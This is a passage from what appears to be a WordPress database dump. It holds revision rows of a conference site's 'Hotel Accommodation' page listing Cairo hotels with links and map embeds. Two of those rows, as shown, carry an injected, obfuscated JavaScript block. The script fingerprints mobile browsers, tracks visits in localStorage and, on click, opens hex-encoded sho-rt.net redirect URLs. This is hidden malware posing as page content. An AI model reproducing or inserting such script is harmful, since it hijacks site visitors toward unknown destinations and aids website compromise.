x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-10-09 03:31:30','2022-10-09 03:31:30','',2685,'https://gsw2023.com/?p=2692',0,'revision','',0),
(2693,1,'2022-10-09 03:32:52','2022-10-09 03:32:52','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a>Other Hotels Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F|title:Hotel%20Accommodation\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"] </p>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n[/vc_hoverbox][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<p>  [/vc_hoverbox][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-10-09 03:32:52','2022-10-09 03:32:52','',2685,'https://gsw2023.com/?p=2693',0,'revision','',0),
(2694,1,'2022-10-09 03:36:20','2022-10-09 03:36:20','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a>Other Hotels Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F|title:Hotel%20Accommodation\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"] </p>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" 